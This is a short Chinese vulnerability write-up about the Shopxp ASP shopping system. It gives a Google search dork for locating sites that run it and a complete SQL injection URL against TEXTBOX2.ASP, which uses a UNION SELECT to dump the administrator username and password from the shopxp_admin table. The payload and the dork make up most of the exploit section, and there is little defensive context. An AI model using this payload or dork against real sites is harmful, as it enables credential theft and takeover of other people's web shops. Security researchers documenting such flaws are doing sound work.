### 0x01 框架概述
Shopxp网上购物系统是一个经过完善设计的经典商城购物管理系统,适用于各种服务器环境的高效网上购物网站建设解决方案。Shopxp 网店系统具有丰富的 web 应用程序设计经验,尤其在购物系统产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术,使得shopxp 商城系统无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。
开发语言:ASP
软件语言:简体中文
数据库:Access、Mssql
关键字:inurl:shopxp_news.asp

### 0x02 漏洞利用
注入代码:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2b';;!!;;'%2bpassword%2b';;!!;;',4,5,6,7%20from%20shopxp_admin
爆出用户名和密码
本地环境示意如下:

利用payload爆出用户名密码如下

Pocsuite证明截图如下

### 0x03 参考链接
http://www.myhack58.com/Article/html/3/62/2012/34043.htm
暂无评论